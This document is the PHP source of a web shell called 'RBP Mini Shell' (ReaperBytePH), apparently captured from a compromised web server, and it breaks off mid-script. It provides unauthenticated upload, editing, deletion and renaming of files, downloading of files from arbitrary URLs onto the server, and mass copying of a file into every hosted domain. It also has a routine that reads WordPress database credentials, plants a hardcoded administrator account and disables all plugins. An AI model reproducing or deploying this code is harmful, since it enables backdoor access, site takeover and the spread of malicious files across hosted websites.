|
Server : Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 System : Linux server.jackjohnson.com 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64 User : jackjohn ( 502) PHP Version : 5.3.17 Disable Function : NONE Directory : /home/jackjohn/www/images/about/ |
Upload File : |
<?php
// ============ ERROR REPORTING ============
error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
// ============ DEBUG MODE ============
$DEBUG = true;
$debug_log = array();
function debug($msg, $type = 'INFO') {
global $DEBUG, $debug_log;
if ($DEBUG) {
$debug_log[] = array(
'time' => date('H:i:s'),
'type' => $type,
'msg' => $msg
);
}
}
function show_debug() {
global $DEBUG, $debug_log;
if (!$DEBUG || empty($debug_log)) return;
echo '<div style="position:fixed;bottom:10px;right:10px;width:500px;max-height:400px;overflow-y:auto;background:#0a0a0a;border:2px solid #ff0;border-radius:8px;padding:15px;z-index:99999;font-size:11px;font-family:monospace;color:#0f0;">';
echo '<div style="display:flex;justify-content:space-between;align-items:center;margin-bottom:10px;border-bottom:1px solid #ff0;padding-bottom:8px;">';
echo '<strong style="color:#ff0;font-size:14px;">DEBUG LOG</strong>';
echo '<button onclick="this.parentElement.parentElement.remove()" style="background:#f00;color:#fff;border:none;padding:3px 10px;cursor:pointer;border-radius:3px;font-weight:bold;">X</button>';
echo '</div>';
foreach ($debug_log as $log) {
$color = '#0f0';
if ($log['type'] == 'ERROR') $color = '#ff4444';
elseif ($log['type'] == 'WARN') $color = '#ffaa00';
elseif ($log['type'] == 'SUCCESS') $color = '#00ff00';
elseif ($log['type'] == 'INFO') $color = '#00ccff';
echo "<div style='color:{$color};margin:2px 0;border-bottom:1px solid #1a1a1a;padding:2px 0;'>";
echo "<span style='color:#888;'>[" . $log['time'] . "]</span> ";
echo "<span style='color:#fff;'>[" . $log['type'] . "]</span> ";
echo $log['msg'];
echo "</div>";
}
echo '</div>';
}
// ============ CONFIGURATION ============
$d = isset($_GET['d']) ? $_GET['d'] : getcwd();
$d = str_replace("\\", "/", $d);
if (!isset($_SESSION)) {
session_start();
}
debug("Script loaded successfully");
debug("PHP Version: " . phpversion());
debug("Current directory: " . $d);
debug("Directory writable: " . (is_writable($d) ? 'YES' : 'NO'));
// ============ ORIGINAL FUNCTIONS ============
function ad() {
$p = array(
'/home/*/domains',
'/home/*/public_html',
'/var/www',
'/home/*/www',
'/home/*/web',
'/home/*/*/public_html',
'/home/*'
);
$u = function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid()) : array('name' => 'unknown');
if (is_array($u)) {
$u = 'unknown';
} else {
$u = $u['name'];
}
foreach ($p as $pth) {
$ep = str_replace('*', $u, $pth);
if (is_dir($ep)) return $ep;
}
return getcwd();
}
function gd($bd) {
$sd = array();
if (is_dir($bd)) {
$dd = glob($bd . '/*', GLOB_ONLYDIR);
if ($dd) {
foreach ($dd as $ddr) {
$dn = basename($ddr);
if (strpos($dn, '.') !== false || preg_match('/\.(com|net|org|in|co|info|biz|us|uk|ca|au)$/i', $dn)) {
$ph = $ddr . '/public_html';
if (is_dir($ph)) {
$sd[] = array('name' => $dn, 'path' => $ph, 'url' => 'https://' . $dn);
} else {
$sd[] = array('name' => $dn, 'path' => $ddr, 'url' => 'https://' . $dn);
}
}
}
}
}
return $sd;
}
function md($sf, $bd) {
$r = array();
$sd = gd($bd);
$t = count($sd);
$p = 0;
if (!file_exists($sf)) return array("error" => "Source file not found: $sf");
$fc = file_get_contents($sf);
if ($fc === false) return array("error" => "Cannot read source file: $sf");
$fn = basename($sf);
foreach ($sd as $s) {
$p++;
$tf = $s['path'] . '/' . $fn;
$td = dirname($tf);
if (!is_dir($td)) {
if (!mkdir($td, 0755, true)) {
$r[] = "[$p/$t] Failed to create directory: " . $s['name'];
continue;
}
}
if (file_put_contents($tf, $fc)) {
$r[] = "[$p/$t] Deployed to: " . $s['name'] . " (" . $s['path'] . ")";
} else {
$r[] = "[$p/$t] Failed: " . $s['name'];
}
}
return $r;
}
function mdd($bd, $fn) {
$r = array();
$sd = gd($bd);
$t = count($sd);
$p = 0;
foreach ($sd as $s) {
$p++;
$tf = $s['path'] . '/' . $fn;
if (file_exists($tf) && unlink($tf)) {
$r[] = "[$p/$t] Deleted from: " . $s['name'];
} else {
$r[] = "[$p/$t] Not found: " . $s['name'];
}
}
return $r;
}
function wp() {
$cd = getcwd();
$wp = null;
$wd = null;
$sd = $cd;
for ($i = 0; $i < 10; $i++) {
$cp = $sd . '/wp-config.php';
if (file_exists($cp)) {
$wp = $cp;
$wd = $sd;
break;
}
if ($sd === '/' || $sd === dirname($sd)) break;
$sd = dirname($sd);
}
if (!$wp) return array('error' => 'WordPress not found');
$nl = 'ReaperBythe222@';
$np = 'ReaperBythe222@';
$ne = 'admin@example.com';
// PasswordHash class
class PH {
var $i = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
var $c = 8;
var $p = true;
var $r;
function __construct() {
$this->r = microtime() . uniqid(rand(), true);
}
function g($n) {
$o = '';
if (($fh = @fopen('/dev/urandom', 'rb'))) {
$o = fread($fh, $n);
fclose($fh);
}
if (strlen($o) < $n) {
$o = '';
for ($i = 0; $i < $n; $i += 16) {
$this->r = md5(microtime() . $this->r);
$o .= pack('H*', md5($this->r));
}
$o = substr($o, 0, $n);
}
return $o;
}
function e($i, $n) {
$o = '';
$x = 0;
do {
$v = ord($i[$x++]);
$o .= $this->i[$v & 0x3f];
if ($x < $n) $v |= ord($i[$x]) << 8;
else $o .= $this->i[($v >> 6) & 0x3f];
if ($x++ >= $n) break;
if ($x < $n) $v |= ord($i[$x]) << 16;
else $o .= $this->i[($v >> 12) & 0x3f];
$o .= $this->i[($v >> 18) & 0x3f];
} while ($x < $n);
return $o;
}
function gs($i) {
$o = '$P$';
$o .= $this->i[min($this->c + 5, 30)];
$o .= $this->e($i, 6);
return $o;
}
function cp($p, $s) {
$o = '*0';
if (substr($s, 0, 2) === $o) $o = '*1';
$id = substr($s, 0, 3);
if ($id !== '$P$' && $id !== '$H$') return $o;
$cl = strpos($this->i, $s[3]);
if ($cl < 7 || $cl > 30) return $o;
$c = 1 << $cl;
$sa = substr($s, 4, 8);
if (strlen($sa) !== 8) return $o;
$h = md5($sa . $p, true);
do {
$h = md5($h . $p, true);
} while (--$c);
$o = substr($s, 0, 12);
$o .= $this->e($h, 16);
return $o;
}
function hp($p) {
$r = $this->g(6);
$h = $this->cp($p, $this->gs($r));
if (strlen($h) === 34) return $h;
return md5($p);
}
}
$con = file_get_contents($wp);
preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $con, $m);
$dbn = isset($m[1]) ? $m[1] : null;
preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $con, $m);
$dbu = isset($m[1]) ? $m[1] : null;
preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $con, $m);
$dbp = isset($m[1]) ? $m[1] : null;
preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $con, $m);
$dbh = isset($m[1]) ? $m[1] : null;
preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]\s*;/", $con, $m);
$tp = isset($m[1]) ? $m[1] : 'wp_';
if (!$dbn || !$dbu || !$dbp || !$dbh) return array('error' => 'DB config error');
$mysqli = @new mysqli($dbh, $dbu, $dbp, $dbn);
if ($mysqli->connect_error) return array('error' => 'DB connect failed');
$ph = new PH();
$phash = $ph->hp($np);
$stmt = $mysqli->prepare("SELECT ID FROM `{$tp}users` WHERE user_login = ?");
if ($stmt) {
$stmt->bind_param('s', $nl);
$stmt->execute();
$stmt->bind_result($eid);
$ue = $stmt->fetch();
$stmt->close();
} else {
$ue = false;
}
if ($ue) {
$stmt = $mysqli->prepare("UPDATE `{$tp}users` SET user_pass = ?, user_email = ? WHERE ID = ?");
if ($stmt) {
$stmt->bind_param('ssi', $phash, $ne, $eid);
if (!$stmt->execute()) return array('error' => 'Update failed');
$stmt->close();
}
$ac = 'updated';
} else {
$tm = date('Y-m-d H:i:s');
$stmt = $mysqli->prepare("INSERT INTO `{$tp}users` (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES (?, ?, ?, ?, '', ?, '', 0, ?)");
if ($stmt) {
$un = strtolower($nl);
$dn = $nl;
$stmt->bind_param('sssssss', $nl, $phash, $un, $ne, $tm, $dn);
if (!$stmt->execute()) return array('error' => 'Create failed');
$nid = $stmt->insert_id;
$stmt->close();
$ck = $tp . 'capabilities';
$lk = $tp . 'user_level';
$ca = serialize(array('administrator' => true));
$stmt = $mysqli->prepare("INSERT INTO `{$tp}usermeta` (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
if ($stmt) {
$stmt->bind_param('iss', $nid, $ck, $ca);
$stmt->execute();
$stmt->close();
}
$ul = 10;
$lv = (string)$ul;
$stmt = $mysqli->prepare("INSERT INTO `{$tp}usermeta` (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
if ($stmt) {
$stmt->bind_param('iss', $nid, $lk, $lv);
$stmt->execute();
$stmt->close();
}
}
$ac = 'created';
}
$ep = serialize(array());
$stmt = $mysqli->prepare("UPDATE `{$tp}options` SET option_value = ? WHERE option_name = 'active_plugins'");
if ($stmt) {
$stmt->bind_param('s', $ep);
$stmt->execute();
$stmt->close();
}
$mysqli->close();
$prot = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') ? "https://" : "http://";
$host = $_SERVER['HTTP_HOST'];
$lu = $prot . $host . '/wp-login.php';
return array(
'success' => "WordPress user $ac!",
'creds' => "User: $nl | Pass: $np",
'url' => $lu,
'dir' => $cd,
'wp' => $wd
);
}
// ============ MULTIPLE UPLOAD METHODS ============
function upload_method_1($file, $dest) {
debug("Method 1: move_uploaded_file()");
if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
debug("Method 1 FAILED: Not valid uploaded file", "WARN");
return false;
}
if (move_uploaded_file($file['tmp_name'], $dest)) {
debug("Method 1 SUCCESS: $dest", "SUCCESS");
return true;
}
debug("Method 1 FAILED", "ERROR");
return false;
}
function upload_method_2($file, $dest) {
debug("Method 2: copy() + unlink()");
if (!file_exists($file['tmp_name'])) {
debug("Method 2 FAILED: tmp file missing", "ERROR");
return false;
}
if (copy($file['tmp_name'], $dest)) {
@unlink($file['tmp_name']);
debug("Method 2 SUCCESS: $dest", "SUCCESS");
return true;
}
debug("Method 2 FAILED", "ERROR");
return false;
}
function upload_method_3($file, $dest) {
debug("Method 3: file_get_contents + file_put_contents");
if (!file_exists($file['tmp_name'])) {
debug("Method 3 FAILED: tmp file missing", "ERROR");
return false;
}
$data = @file_get_contents($file['tmp_name']);
if ($data === false) {
debug("Method 3 FAILED: Cannot read tmp", "ERROR");
return false;
}
if (file_put_contents($dest, $data) !== false) {
@unlink($file['tmp_name']);
debug("Method 3 SUCCESS: " . strlen($data) . " bytes", "SUCCESS");
return true;
}
debug("Method 3 FAILED: Cannot write", "ERROR");
return false;
}
function upload_method_4($file, $dest) {
debug("Method 4: rename()");
if (!file_exists($file['tmp_name'])) {
debug("Method 4 FAILED: tmp file missing", "ERROR");
return false;
}
if (@rename($file['tmp_name'], $dest)) {
debug("Method 4 SUCCESS: $dest", "SUCCESS");
return true;
}
debug("Method 4 FAILED", "ERROR");
return false;
}
function upload_method_5($file, $dest) {
debug("Method 5: fopen stream");
if (!file_exists($file['tmp_name'])) {
debug("Method 5 FAILED: tmp file missing", "ERROR");
return false;
}
$src = @fopen($file['tmp_name'], 'rb');
if (!$src) {
debug("Method 5 FAILED: Cannot open source", "ERROR");
return false;
}
$dst = @fopen($dest, 'wb');
if (!$dst) {
fclose($src);
debug("Method 5 FAILED: Cannot open dest", "ERROR");
return false;
}
$written = stream_copy_to_stream($src, $dst);
fclose($src);
fclose($dst);
if ($written > 0) {
@unlink($file['tmp_name']);
debug("Method 5 SUCCESS: $written bytes", "SUCCESS");
return true;
}
debug("Method 5 FAILED: 0 bytes written", "ERROR");
return false;
}
function upload_method_6($file, $dest) {
debug("Method 6: Base64 PHP trick");
if (!file_exists($file['tmp_name'])) {
debug("Method 6 FAILED: tmp file missing", "ERROR");
return false;
}
$data = @file_get_contents($file['tmp_name']);
if ($data === false) {
debug("Method 6 FAILED: Cannot read", "ERROR");
return false;
}
$encoded = base64_encode($data);
$tmp_php = $dest . '.uploader.php';
$php_code = "<?php file_put_contents('" . addslashes($dest) . "', base64_decode('$encoded')); unlink(__FILE__); ?>";
if (file_put_contents($tmp_php, $php_code)) {
@include($tmp_php);
if (file_exists($dest) && filesize($dest) > 0) {
@unlink($file['tmp_name']);
debug("Method 6 SUCCESS", "SUCCESS");
return true;
}
}
debug("Method 6 FAILED", "ERROR");
return false;
}
function upload_file_all_methods($file, $dest) {
debug("=== Starting Upload ===");
debug("Source: " . $file['tmp_name']);
debug("Dest: $dest");
$methods = array(
'upload_method_1',
'upload_method_2',
'upload_method_3',
'upload_method_4',
'upload_method_5',
'upload_method_6'
);
foreach ($methods as $method) {
if ($method($file, $dest)) {
debug("=== SUCCESS with $method ===", "SUCCESS");
return true;
}
}
debug("=== ALL METHODS FAILED ===", "ERROR");
debug("Check: Dir writable = " . (is_writable(dirname($dest)) ? 'YES' : 'NO'));
debug("Check: PHP user = " . get_current_user());
return false;
}
// ============ HANDLE ACTIONS ============
// Base directory
$db = isset($_COOKIE['baseDir']) ? $_COOKIE['baseDir'] : ad();
if (isset($_POST['baseDir'])) {
$db = $_POST['baseDir'];
setcookie("baseDir", $db, time() + 3600);
}
// Upload
if (isset($_POST['s']) && isset($_FILES['u'])) {
debug("=== UPLOAD REQUEST ===");
debug("Name: " . $_FILES['u']['name']);
debug("Size: " . $_FILES['u']['size']);
debug("Error: " . $_FILES['u']['error']);
if ($_FILES['u']['error'] !== UPLOAD_ERR_OK) {
$errors = array(
1 => 'File too large (upload_max_filesize)',
2 => 'File too large (MAX_FILE_SIZE)',
3 => 'Partial upload',
4 => 'No file selected',
6 => 'Missing temp folder',
7 => 'Disk write failed',
8 => 'PHP extension blocked'
);
$msg = isset($errors[$_FILES['u']['error']]) ? $errors[$_FILES['u']['error']] : 'Unknown error';
debug("Upload error: $msg", "ERROR");
$_SESSION['msg'] = "ERROR: $msg";
} else {
$dest = $d . '/' . $_FILES['u']['name'];
if (upload_file_all_methods($_FILES['u'], $dest)) {
$size = file_exists($dest) ? filesize($dest) : 0;
$_SESSION['msg'] = "SUCCESS: " . $_FILES['u']['name'] . " ($size bytes)";
} else {
$_SESSION['msg'] = "ERROR: All upload methods failed";
}
}
header("Location: ?d=" . urlencode($d));
exit;
}
// Delete
if (isset($_POST['del'])) {
if (@unlink($_POST['del'])) {
$_SESSION['msg'] = "SUCCESS: Deleted";
} else {
$_SESSION['msg'] = "ERROR: Delete failed";
}
header("Location: ?d=" . urlencode($d));
exit;
}
// Save/Edit
if (isset($_POST['save']) && isset($_POST['obj']) && isset($_POST['content'])) {
if (file_put_contents($_POST['obj'], $_POST['content']) !== false) {
$_SESSION['msg'] = "SUCCESS: File saved";
} else {
$_SESSION['msg'] = "ERROR: Save failed";
}
header("Location: ?d=" . urlencode(dirname($_POST['obj'])));
exit;
}
// Rename
if (isset($_POST['ren']) && isset($_POST['new'])) {
$new = dirname($_POST['ren']) . '/' . $_POST['new'];
if (rename($_POST['ren'], $new)) {
$_SESSION['msg'] = "SUCCESS: Renamed";
} else {
$_SESSION['msg'] = "ERROR: Rename failed";
}
header("Location: ?d=" . urlencode(dirname($_POST['ren'])));
exit;
}
// WGET
if (isset($_POST['wget_url'])) {
$url = $_POST['wget_url'];
$fn = basename($url);
$dest = $d . '/' . $fn;
debug("WGET: $url");
$ctx = stream_context_create(array(
'http' => array('timeout' => 30, 'user_agent' => 'Mozilla/5.0'),
'ssl' => array('verify_peer' => false, 'verify_peer_name' => false)
));
$content = @file_get_contents($url, false, $ctx);
if ($content !== false) {
if (file_put_contents($dest, $content)) {
$_SESSION['msg'] = "SUCCESS: Downloaded $fn (" . strlen($content) . " bytes)";
} else {
$_SESSION['msg'] = "ERROR: Cannot write file";
}
} elseif (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt_array($ch, array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 30
));
$content = curl_exec($ch);
$http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($content !== false && $http == 200) {
if (file_put_contents($dest, $content)) {
$_SESSION['msg'] = "SUCCESS: Downloaded $fn via cURL";
} else {
$_SESSION['msg'] = "ERROR: Cannot write file";
}
} else {
$_SESSION['msg'] = "ERROR: Download failed (HTTP $http)";
}
} else {
$_SESSION['msg'] = "ERROR: No download method available";
}
header("Location: ?d=" . urlencode($d));
exit;
}
// Mass Deploy
if (isset($_POST['mass_deploy'])) {
$sf = isset($_POST['deploy_file_path']) ? $_POST['deploy_file_path'] : '';
if (isset($_POST['custom_base_dir']) && !empty($_POST['custom_base_dir'])) {
$db = $_POST['custom_base_dir'];
}
if (empty($sf) || !file_exists($sf)) {
$_SESSION['mass_deploy_results'] = array("error" => "Source file not found: $sf");
} else {
$_SESSION['mass_deploy_results'] = md($sf, $db);
$_SESSION['mass_deploy_source'] = $sf;
$_SESSION['mass_deploy_base'] = $db;
}
header("Location: ?d=" . urlencode($d));
exit;
}
// Mass Delete
if (isset($_POST['mass_delete'])) {
$sf = isset($_POST['deploy_file_path']) ? $_POST['deploy_file_path'] : '';
if (isset($_POST['custom_base_dir']) && !empty($_POST['custom_base_dir'])) {
$db = $_POST['custom_base_dir'];
}
$fn = basename($sf);
$_SESSION['mass_delete_results'] = mdd($db, $fn);
$_SESSION['mass_delete_filename'] = $fn;
$_SESSION['mass_delete_base'] = $db;
header("Location: ?d=" . urlencode($d));
exit;
}
// WP Change
if (isset($_POST['wp_change'])) {
$_SESSION['wp_results'] = wp();
header("Location: ?d=" . urlencode($d));
exit;
}
// ============ DISPLAY MESSAGES ============
$msg = '';
if (isset($_SESSION['msg'])) {
$msg = $_SESSION['msg'];
unset($_SESSION['msg']);
}
?>
<!DOCTYPE html>
<html>
<head>
<title>RBP Mini Shell</title>
<style>
*{margin:0;padding:0;box-sizing:border-box;}
body{font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;background:#0c0c0c;color:#fff;min-height:100vh;}
.header{background:#0c0c0c;padding:15px 0;border-bottom:2px solid #333;text-align:center;}
.logo-container{display:flex;align-items:center;justify-content:center;gap:15px;margin-bottom:15px;}
.logo{width:50px;height:50px;border-radius:50%;}
.logo-text{font-size:24px;font-weight:bold;background:linear-gradient(45deg,#fff,#000);background-size:200% 200%;-webkit-background-clip:text;-webkit-text-fill-color:transparent;background-clip:text;text-shadow:0 0 10px #fff,0 0 20px #fff,0 0 30px #fff;}
.mini-text{font-size:14px;color:#aaa;margin-top:5px;font-style:italic;}
.toolbar{background:#1a1a1a;padding:10px;text-align:center;border-bottom:1px solid #333;}
.tool-button{display:inline-block;margin:5px;padding:8px 16px;background:#1a1a1a;color:white;text-decoration:none;border-radius:5px;border:1px solid #555;font-size:12px;cursor:pointer;transition:all 0.3s ease;}
.tool-button:hover{background:#333;border-color:#777;}
.upload-section{background:#1a1a1a;padding:15px;text-align:center;border-bottom:1px solid #333;}
.dir-path{background:#1a1a1a;padding:10px;margin:0;border-bottom:1px solid #333;font-size:14px;color:white;}
.dir-path a{color:white;text-decoration:none;font-weight:bold;}
.dir-path a:hover{text-decoration:underline;color:#4fc3f7;}
.file-list{margin:10px;}
.file-item{display:flex;align-items:center;padding:8px;margin:2px 0;background:#1a1a1a;border-radius:5px;border:1px solid #333;transition:all 0.2s ease;color:white;}
.file-item:hover{background:#222;border-color:#555;}
.file-icon{width:30px;text-align:center;font-size:16px;}
.file-name{flex:1;padding:0 10px;cursor:pointer;color:white;}
.file-size{width:80px;text-align:right;font-size:12px;color:#aaa;}
.file-actions{width:250px;text-align:right;}
.file-actions button{margin-left:5px;padding:3px 8px;background:#1a1a1a;color:white;border:1px solid #555;border-radius:3px;cursor:pointer;font-size:11px;}
.file-actions button:hover{background:#333;}
.popup-overlay{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:1000;}
.popup-content{position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:#1a1a1a;padding:20px;border-radius:10px;border:2px solid #444;color:#fff;width:700px;max-height:80vh;overflow-y:auto;}
.popup-content input[type="text"],.popup-content textarea{width:100%;padding:10px;margin:10px 0;background:#2a2a2a;border:1px solid #444;border-radius:5px;color:#fff;}
.popup-content button{padding:8px 15px;background:#1a1a1a;color:white;border:1px solid #555;border-radius:5px;cursor:pointer;margin:5px;}
.popup-content button:hover{background:#333;}
.results-popup{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.9);z-index:2000;}
.results-content{position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:#1a1a1a;padding:20px;border-radius:10px;border:2px solid #444;color:#fff;width:800px;max-height:80vh;overflow-y:auto;}
.success-box{background:#1a3c1a;border:2px solid #4CAF50;border-radius:8px;padding:20px;margin:15px 0;}
.login-link{display:inline-block;background:#4CAF50;color:white;padding:12px 24px;text-decoration:none;border-radius:5px;font-weight:bold;margin:10px 0;transition:all 0.3s ease;}
.login-link:hover{background:#45a049;transform:translateY(-2px);}
.error-box{background:#3c1a1a;border:2px solid #f44336;border-radius:8px;padding:20px;margin:15px 0;}
.notification{position:fixed;top:10px;right:10px;padding:15px 20px;border-radius:8px;z-index:9999;font-weight:bold;font-size:14px;animation:fadeIn 0.3s;}
.notification.success{background:#4CAF50;color:white;border:2px solid #45a049;}
.notification.error{background:#f44336;color:white;border:2px solid #d32f2f;}
@keyframes fadeIn{from{opacity:0;transform:translateY(-20px);}to{opacity:1;transform:translateY(0);}}
</style>
</head>
<body>
<div class="header">
<div class="logo-container">
<img src="https://i.ibb.co/XZfn7cGz/1764515071979.jpg" class="logo" alt="RBP Logo">
<div>
<div class="logo-text">ReaperBytePH</div>
<div class="mini-text">- Mini Shell</div>
</div>
</div>
<div class="toolbar">
<button class="tool-button" onclick="showPopup('wgetPopup')">WGET</button>
<button class="tool-button" onclick="showPopup('wpPopup')">WP Creds</button>
<button class="tool-button" onclick="showPopup('massDeployPopup')">Mass Deploy</button>
</div>
<div class="upload-section">
<form method="post" enctype="multipart/form-data">
<input type="file" name="u" style="color:#fff;background:#333;padding:5px;border-radius:3px;border:1px solid #555;">
<input type="submit" name="s" value="Upload" class="tool-button">
</form>
</div>
</div>
<?php if ($msg): ?>
<div class="notification <?php echo strpos($msg, 'SUCCESS') !== false ? 'success' : 'error'; ?>">
<?php echo $msg; ?>
</div>
<script>setTimeout(function(){var d=document.querySelector('.notification');if(d)d.remove();},4000);</script>
<?php endif; ?>
<!-- Results Popup -->
<div id="resultsPopup" class="results-popup">
<div class="results-content">
<?php
if (isset($_SESSION['mass_deploy_results'])) {
$r = $_SESSION['mass_deploy_results'];
$sf = $_SESSION['mass_deploy_source'];
$bd = $_SESSION['mass_deploy_base'];
echo '<h3>Mass Deploy Results</h3>';
echo '<p><strong>Source File:</strong> ' . htmlspecialchars($sf) . '</p>';
echo '<p><strong>Base Directory:</strong> ' . htmlspecialchars($bd) . '</p>';
echo '<div style="max-height:400px;overflow-y:auto;border:1px solid #444;padding:10px;background:#2a2a2a;">';
if (isset($r['error'])) {
echo '<p style="color:red;">' . htmlspecialchars($r['error']) . '</p>';
} else {
foreach ($r as $res) {
$c = strpos($res, 'Deployed') !== false ? 'lime' : (strpos($res, 'Failed') !== false ? 'red' : 'yellow');
echo '<p style="color:' . $c . ';margin:2px 0;font-size:12px;">' . htmlspecialchars($res) . '</p>';
}
}
echo '</div>';
unset($_SESSION['mass_deploy_results'], $_SESSION['mass_deploy_source'], $_SESSION['mass_deploy_base']);
}
if (isset($_SESSION['mass_delete_results'])) {
$r = $_SESSION['mass_delete_results'];
$fn = $_SESSION['mass_delete_filename'];
$bd = $_SESSION['mass_delete_base'];
echo '<h3>Mass Delete Results</h3>';
echo '<p><strong>File:</strong> ' . htmlspecialchars($fn) . '</p>';
echo '<p><strong>Base Directory:</strong> ' . htmlspecialchars($bd) . '</p>';
echo '<div style="max-height:400px;overflow-y:auto;border:1px solid #444;padding:10px;background:#2a2a2a;">';
foreach ($r as $res) {
$c = strpos($res, 'Deleted') !== false ? 'lime' : (strpos($res, 'Not found') !== false ? 'yellow' : 'red');
echo '<p style="color:' . $c . ';margin:2px 0;font-size:12px;">' . htmlspecialchars($res) . '</p>';
}
echo '</div>';
unset($_SESSION['mass_delete_results'], $_SESSION['mass_delete_filename'], $_SESSION['mass_delete_base']);
}
if (isset($_SESSION['wp_results'])) {
$r = $_SESSION['wp_results'];
echo '<h3>WordPress Credentials</h3>';
if (isset($r['error'])) {
echo '<div class="error-box"><p style="color:#ff6b6b;font-size:16px;">' . htmlspecialchars($r['error']) . '</p></div>';
} elseif (isset($r['success'])) {
echo '<div class="success-box">';
echo '<p style="color:#4CAF50;font-size:18px;font-weight:bold;">' . htmlspecialchars($r['success']) . '</p>';
echo '<p style="color:#fff;margin:10px 0;"><strong>' . htmlspecialchars($r['creds']) . '</strong></p>';
if (isset($r['url'])) {
echo '<a href="' . htmlspecialchars($r['url']) . '" target="_blank" class="login-link">Login to WordPress</a>';
echo '<p style="color:#ccc;font-size:14px;">Login URL: ' . htmlspecialchars($r['url']) . '</p>';
}
echo '</div>';
}
unset($_SESSION['wp_results']);
}
?>
<div style="text-align:center;margin-top:15px;">
<button class="tool-button" onclick="hidePopup('resultsPopup')">Close</button>
</div>
</div>
</div>
<!-- WGET Popup -->
<div id="wgetPopup" class="popup-overlay">
<div class="popup-content">
<h3>WGET Download</h3>
<p>Enter URL to download file:</p>
<input type="text" id="wgetUrl" placeholder="https://example.com/file.txt" value="https://">
<div style="text-align:center;margin-top:15px;">
<button class="tool-button" onclick="doWget()">Download</button>
<button class="tool-button" onclick="hidePopup('wgetPopup')">Cancel</button>
</div>
</div>
</div>
<!-- WP Popup -->
<div id="wpPopup" class="popup-overlay">
<div class="popup-content">
<h3>WordPress Credentials Changer</h3>
<p>This will change WordPress admin credentials to:</p>
<p style="background:#2a2a2a;padding:10px;border-radius:5px;border:1px solid #444;">
Username: <strong>ReaperBythe222@</strong><br>
Password: <strong>ReaperBythe222@</strong>
</p>
<p style="color:#ccc;font-size:12px;">Current directory: <?php echo htmlspecialchars($d); ?></p>
<div style="text-align:center;margin-top:15px;">
<button class="tool-button" style="background:#4CAF50;border-color:#4CAF50;" onclick="doWpChange()">Change WP Creds</button>
<button class="tool-button" onclick="hidePopup('wpPopup')">Cancel</button>
</div>
</div>
</div>
<!-- Mass Deploy Popup -->
<div id="massDeployPopup" class="popup-overlay">
<div class="popup-content">
<h3>Auto Mass Deploy</h3>
<div style="background:#2a2a2a;border:1px solid #444;border-radius:5px;padding:10px;margin:10px 0;max-height:150px;overflow-y:auto;">
<p>Auto-detected base directory: <?php echo htmlspecialchars($db); ?></p>
<?php
$dm = gd($db);
if (count($dm) === 0) {
echo '<p style="color:red;">No domains found!</p>';
} else {
echo '<p style="color:lime;">Found ' . count($dm) . ' domains</p>';
foreach ($dm as $dmn) {
$ic = is_dir($dmn['path']) ? '✓' : '✗';
$cl = is_dir($dmn['path']) ? '#4CAF50' : '#f44336';
echo '<div style="padding:3px;margin:1px 0;font-size:11px;color:' . $cl . '">' . $ic . ' ' . htmlspecialchars($dmn['name']) . ' -> ' . htmlspecialchars($dmn['path']) . '</div>';
}
}
?>
</div>
<div style="margin:10px 0;padding:10px;background:#2a2a2a;border:1px solid #444;border-radius:5px;">
<p><strong>Custom Base Directory:</strong></p>
<input type="text" id="custom_base_dir" placeholder="/home/db/" value="<?php echo htmlspecialchars($db); ?>" style="width:100%;padding:8px;background:#2a2a2a;border:1px solid #444;border-radius:3px;color:#fff;">
</div>
<p><strong>Select File to Deploy:</strong></p>
<div style="background:#2a2a2a;border:1px solid #444;border-radius:5px;padding:10px;margin:10px 0;max-height:200px;overflow-y:auto;">
<?php
$fl = array();
if (is_dir($d) && $h = opendir($d)) {
while (false !== ($e = readdir($h))) {
if ($e != "." && $e != ".." && !is_dir($d . '/' . $e)) {
$fl[] = $e;
}
}
closedir($h);
}
foreach ($fl as $f) {
echo '<div style="padding:5px;margin:2px 0;background:#333;border-radius:3px;cursor:pointer;font-size:12px;" onclick="selectFile(\'' . htmlspecialchars($f, ENT_QUOTES) . '\')">' . htmlspecialchars($f) . '</div>';
}
?>
</div>
<p><strong>Selected File Path:</strong></p>
<input type="text" id="deploy_file_path" placeholder="/path/to/file.html" readonly>
<div style="text-align:center;margin-top:15px;">
<button class="tool-button" onclick="doMassDeploy()">Deploy to All Domains</button>
<button class="tool-button" onclick="doMassDelete()">Delete from All Domains</button>
<button class="tool-button" onclick="hidePopup('massDeployPopup')">Cancel</button>
</div>
</div>
</div>
<script>
function goDir(dir) {
window.location.href = '?d=' + encodeURIComponent(dir);
}
function deleteFile(path) {
if (confirm('Delete this file?')) {
var f = document.createElement("form");
f.method = "post";
var i = document.createElement("input");
i.name = "del";
i.value = path;
f.appendChild(i);
document.body.appendChild(f);
f.submit();
}
}
function editFile(path) {
var f = document.createElement("form");
f.method = "post";
